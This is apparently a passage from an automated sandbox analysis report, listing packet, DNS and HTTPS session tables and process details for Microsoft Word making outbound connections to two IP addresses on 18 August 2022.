Aug 18, 2022 04:23:26.614263058 CEST | 49177 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:26.614304066 CEST | 49177 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:26.858321905 CEST | 49178 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:26.858359098 CEST | 443 | 49178 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:26.858422041 CEST | 49178 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:26.858665943 CEST | 49178 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:26.858675003 CEST | 443 | 49178 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:27.012851000 CEST | 443 | 49178 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:27.013005018 CEST | 49178 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:27.026124954 CEST | 49178 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:27.026143074 CEST | 443 | 49178 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:27.031104088 CEST | 49178 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:27.031117916 CEST | 443 | 49178 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:27.270103931 CEST | 443 | 49178 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:27.270303011 CEST | 49178 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:27.270345926 CEST | 443 | 49178 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:27.270406961 CEST | 443 | 49178 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:27.270442963 CEST | 49178 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:27.270478964 CEST | 49178 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:27.272536039 CEST | 49178 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:27.272553921 CEST | 443 | 49178 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:27.272562981 CEST | 49178 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:27.272663116 CEST | 49178 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:27.277162075 CEST | 49179 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:27.277194977 CEST | 443 | 49179 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:27.277292013 CEST | 49179 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:27.277452946 CEST | 49179 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:27.277466059 CEST | 443 | 49179 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:27.435266018 CEST | 443 | 49179 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:27.435353041 CEST | 49179 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:27.445326090 CEST | 49179 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:27.445354939 CEST | 443 | 49179 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:27.448277950 CEST | 49179 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:27.448295116 CEST | 443 | 49179 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:27.704734087 CEST | 443 | 49179 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:27.704863071 CEST | 443 | 49179 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:27.704864979 CEST | 49179 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:27.704927921 CEST | 49179 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:27.707458973 CEST | 49179 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:27.707493067 CEST | 443 | 49179 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:27.707508087 CEST | 49179 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:27.707556963 CEST | 49179 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:27.960454941 CEST | 49180 | 443 | 192.168.2.22 | 34.149.204.188 |
Aug 18, 2022 04:23:27.960529089 CEST | 443 | 49180 | 34.149.204.188 | 192.168.2.22 |
Aug 18, 2022 04:23:27.960603952 CEST | 49180 | 443 | 192.168.2.22 | 34.149.204.188 |
Aug 18, 2022 04:23:27.960980892 CEST | 49180 | 443 | 192.168.2.22 | 34.149.204.188 |
Aug 18, 2022 04:23:27.961014032 CEST | 443 | 49180 | 34.149.204.188 | 192.168.2.22 |
Aug 18, 2022 04:23:28.121545076 CEST | 443 | 49180 | 34.149.204.188 | 192.168.2.22 |
Aug 18, 2022 04:23:28.121634007 CEST | 49180 | 443 | 192.168.2.22 | 34.149.204.188 |
Aug 18, 2022 04:23:28.129580975 CEST | 49180 | 443 | 192.168.2.22 | 34.149.204.188 |
Aug 18, 2022 04:23:28.129622936 CEST | 443 | 49180 | 34.149.204.188 | 192.168.2.22 |
Aug 18, 2022 04:23:28.130244017 CEST | 443 | 49180 | 34.149.204.188 | 192.168.2.22 |
Aug 18, 2022 04:23:28.137130976 CEST | 49180 | 443 | 192.168.2.22 | 34.149.204.188 |
Aug 18, 2022 04:23:28.179383039 CEST | 443 | 49180 | 34.149.204.188 | 192.168.2.22 |
Aug 18, 2022 04:23:28.368267059 CEST | 443 | 49180 | 34.149.204.188 | 192.168.2.22 |
Aug 18, 2022 04:23:28.368328094 CEST | 443 | 49180 | 34.149.204.188 | 192.168.2.22 |
Aug 18, 2022 04:23:28.368494987 CEST | 49180 | 443 | 192.168.2.22 | 34.149.204.188 |
Aug 18, 2022 04:23:28.368623018 CEST | 49180 | 443 | 192.168.2.22 | 34.149.204.188 |
Aug 18, 2022 04:23:28.368648052 CEST | 443 | 49180 | 34.149.204.188 | 192.168.2.22 |
Aug 18, 2022 04:23:28.368650913 CEST | 49180 | 443 | 192.168.2.22 | 34.149.204.188 |
Aug 18, 2022 04:23:28.368657112 CEST | 443 | 49180 | 34.149.204.188 | 192.168.2.22 |
Aug 18, 2022 04:23:28.386130095 CEST | 49181 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:28.386181116 CEST | 443 | 49181 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:28.386297941 CEST | 49181 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:28.386497021 CEST | 49181 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:28.386511087 CEST | 443 | 49181 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:28.540741920 CEST | 443 | 49181 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:28.540919065 CEST | 49181 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:28.553978920 CEST | 49181 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:28.554003954 CEST | 443 | 49181 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:28.557967901 CEST | 49181 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:28.557991028 CEST | 443 | 49181 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:28.806519985 CEST | 443 | 49181 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:28.806607008 CEST | 443 | 49181 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:28.806664944 CEST | 49181 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:28.806685925 CEST | 443 | 49181 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:28.806705952 CEST | 49181 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:28.806710005 CEST | 443 | 49181 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:28.806740046 CEST | 49181 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:28.806747913 CEST | 443 | 49181 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:28.806757927 CEST | 49181 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:28.806785107 CEST | 443 | 49181 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:28.806796074 CEST | 49181 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:28.806828022 CEST | 49181 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:28.815222979 CEST | 49181 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:28.815262079 CEST | 443 | 49181 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:28.987804890 CEST | 49182 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:28.987871885 CEST | 443 | 49182 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:28.988006115 CEST | 49182 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:28.988214970 CEST | 49182 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:28.988235950 CEST | 443 | 49182 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:29.143070936 CEST | 443 | 49182 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:29.143218040 CEST | 49182 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:29.151287079 CEST | 49182 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:29.151323080 CEST | 443 | 49182 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:29.154943943 CEST | 49182 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:29.154972076 CEST | 443 | 49182 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:29.408413887 CEST | 443 | 49182 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:29.408503056 CEST | 443 | 49182 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:29.408638000 CEST | 49182 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:29.408730030 CEST | 49182 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:29.408745050 CEST | 443 | 49182 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:29.408781052 CEST | 49182 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:29.408834934 CEST | 49182 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:29.584225893 CEST | 49183 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:29.584290028 CEST | 443 | 49183 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:29.584357977 CEST | 49183 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:29.584625959 CEST | 49183 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:29.584644079 CEST | 443 | 49183 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:29.739150047 CEST | 443 | 49183 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:29.739248037 CEST | 49183 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:29.747014046 CEST | 49183 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:29.747044086 CEST | 443 | 49183 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:29.750628948 CEST | 49183 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:29.750654936 CEST | 443 | 49183 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:29.972436905 CEST | 443 | 49183 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:29.972520113 CEST | 443 | 49183 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:29.972626925 CEST | 49183 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:29.972666979 CEST | 49183 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:29.972753048 CEST | 49183 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:29.972784042 CEST | 443 | 49183 | 35.186.245.55 | 192.168.2.22 |
Aug 18, 2022 04:23:29.972795963 CEST | 49183 | 443 | 192.168.2.22 | 35.186.245.55 |
Aug 18, 2022 04:23:29.972835064 CEST | 49183 | 443 | 192.168.2.22 | 35.186.245.55 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Aug 18, 2022 04:23:06.071744919 CEST | 55868 | 53 | 192.168.2.22 | 8.8.8.8 |
Aug 18, 2022 04:23:06.182066917 CEST | 53 | 55868 | 8.8.8.8 | 192.168.2.22 |
Aug 18, 2022 04:23:18.824484110 CEST | 49688 | 53 | 192.168.2.22 | 8.8.8.8 |
Aug 18, 2022 04:23:18.931935072 CEST | 53 | 49688 | 8.8.8.8 | 192.168.2.22 |
Aug 18, 2022 04:23:18.939836979 CEST | 58836 | 53 | 192.168.2.22 | 8.8.8.8 |
Aug 18, 2022 04:23:19.049377918 CEST | 53 | 58836 | 8.8.8.8 | 192.168.2.22 |
Aug 18, 2022 04:23:23.852726936 CEST | 50134 | 53 | 192.168.2.22 | 8.8.8.8 |
Aug 18, 2022 04:23:23.871582985 CEST | 53 | 50134 | 8.8.8.8 | 192.168.2.22 |
Aug 18, 2022 04:23:23.885284901 CEST | 55275 | 53 | 192.168.2.22 | 8.8.8.8 |
Aug 18, 2022 04:23:23.994752884 CEST | 53 | 55275 | 8.8.8.8 | 192.168.2.22 |
Aug 18, 2022 04:23:27.740761995 CEST | 59915 | 53 | 192.168.2.22 | 8.8.8.8 |
Aug 18, 2022 04:23:27.850553036 CEST | 53 | 59915 | 8.8.8.8 | 192.168.2.22 |
Aug 18, 2022 04:23:27.853646040 CEST | 54408 | 53 | 192.168.2.22 | 8.8.8.8 |
Aug 18, 2022 04:23:27.959486961 CEST | 53 | 54408 | 8.8.8.8 | 192.168.2.22 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Aug 18, 2022 04:23:06.071744919 CEST | 192.168.2.22 | 8.8.8.8 | 0xeea0 | Standard query (0) | A (IP address) | IN (0x0001) | |
Aug 18, 2022 04:23:18.824484110 CEST | 192.168.2.22 | 8.8.8.8 | 0x5748 | Standard query (0) | A (IP address) | IN (0x0001) | |
Aug 18, 2022 04:23:18.939836979 CEST | 192.168.2.22 | 8.8.8.8 | 0x5dea | Standard query (0) | A (IP address) | IN (0x0001) | |
Aug 18, 2022 04:23:23.852726936 CEST | 192.168.2.22 | 8.8.8.8 | 0xdc64 | Standard query (0) | A (IP address) | IN (0x0001) | |
Aug 18, 2022 04:23:23.885284901 CEST | 192.168.2.22 | 8.8.8.8 | 0xbe50 | Standard query (0) | A (IP address) | IN (0x0001) | |
Aug 18, 2022 04:23:27.740761995 CEST | 192.168.2.22 | 8.8.8.8 | 0x10d3 | Standard query (0) | A (IP address) | IN (0x0001) | |
Aug 18, 2022 04:23:27.853646040 CEST | 192.168.2.22 | 8.8.8.8 | 0x722d | Standard query (0) | A (IP address) | IN (0x0001) |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Aug 18, 2022 04:23:06.182066917 CEST | 8.8.8.8 | 192.168.2.22 | 0xeea0 | No error (0) | 35.186.245.55 | A (IP address) | IN (0x0001) | ||
Aug 18, 2022 04:23:18.931935072 CEST | 8.8.8.8 | 192.168.2.22 | 0x5748 | No error (0) | 34.149.204.188 | A (IP address) | IN (0x0001) | ||
Aug 18, 2022 04:23:19.049377918 CEST | 8.8.8.8 | 192.168.2.22 | 0x5dea | No error (0) | 34.149.204.188 | A (IP address) | IN (0x0001) | ||
Aug 18, 2022 04:23:23.871582985 CEST | 8.8.8.8 | 192.168.2.22 | 0xdc64 | No error (0) | 34.149.204.188 | A (IP address) | IN (0x0001) | ||
Aug 18, 2022 04:23:23.994752884 CEST | 8.8.8.8 | 192.168.2.22 | 0xbe50 | No error (0) | 34.149.204.188 | A (IP address) | IN (0x0001) | ||
Aug 18, 2022 04:23:27.850553036 CEST | 8.8.8.8 | 192.168.2.22 | 0x10d3 | No error (0) | 34.149.204.188 | A (IP address) | IN (0x0001) | ||
Aug 18, 2022 04:23:27.959486961 CEST | 8.8.8.8 | 192.168.2.22 | 0x722d | No error (0) | 35.186.245.55 | A (IP address) | IN (0x0001) |
|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.22 | 49173 | 35.186.245.55 | 443 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-08-18 02:23:06 UTC | 0 | OUT | |
2022-08-18 02:23:07 UTC | 0 | IN | |
2022-08-18 02:23:07 UTC | 0 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
1 | 192.168.2.22 | 49174 | 34.149.204.188 | 443 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-08-18 02:23:19 UTC | 0 | OUT | |
2022-08-18 02:23:19 UTC | 0 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
10 | 192.168.2.22 | 49183 | 35.186.245.55 | 443 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-08-18 02:23:29 UTC | 17 | OUT | |
2022-08-18 02:23:29 UTC | 18 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
2 | 192.168.2.22 | 49175 | 34.149.204.188 | 443 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-08-18 02:23:24 UTC | 1 | OUT | |
2022-08-18 02:23:24 UTC | 1 | IN | |
2022-08-18 02:23:24 UTC | 1 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
3 | 192.168.2.22 | 49176 | 35.186.245.55 | 443 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-08-18 02:23:24 UTC | 2 | OUT | |
2022-08-18 02:23:24 UTC | 2 | IN | |
2022-08-18 02:23:24 UTC | 2 | IN | |
2022-08-18 02:23:24 UTC | 3 | IN | |
2022-08-18 02:23:24 UTC | 5 | IN | |
2022-08-18 02:23:24 UTC | 6 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
4 | 192.168.2.22 | 49177 | 35.186.245.55 | 443 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-08-18 02:23:26 UTC | 8 | OUT | |
2022-08-18 02:23:26 UTC | 8 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
5 | 192.168.2.22 | 49178 | 35.186.245.55 | 443 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-08-18 02:23:27 UTC | 9 | OUT | |
2022-08-18 02:23:27 UTC | 9 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
6 | 192.168.2.22 | 49179 | 35.186.245.55 | 443 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-08-18 02:23:27 UTC | 9 | OUT | |
2022-08-18 02:23:27 UTC | 9 | IN | |
2022-08-18 02:23:27 UTC | 10 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
7 | 192.168.2.22 | 49180 | 34.149.204.188 | 443 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-08-18 02:23:28 UTC | 10 | OUT | |
2022-08-18 02:23:28 UTC | 10 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
8 | 192.168.2.22 | 49181 | 35.186.245.55 | 443 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-08-18 02:23:28 UTC | 10 | OUT | |
2022-08-18 02:23:28 UTC | 11 | IN | |
2022-08-18 02:23:28 UTC | 11 | IN | |
2022-08-18 02:23:28 UTC | 12 | IN | |
2022-08-18 02:23:28 UTC | 14 | IN | |
2022-08-18 02:23:28 UTC | 15 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
9 | 192.168.2.22 | 49182 | 35.186.245.55 | 443 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-08-18 02:23:29 UTC | 17 | OUT | |
2022-08-18 02:23:29 UTC | 17 | IN |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Target ID: | 0 |
Start time: | 04:22:15 |
Start date: | 18/08/2022 |
Path: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x13fd60000 |
File size: | 1423704 bytes |
MD5 hash: | 9EE74859D22DAE61F1750B3A1BACB6F5 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |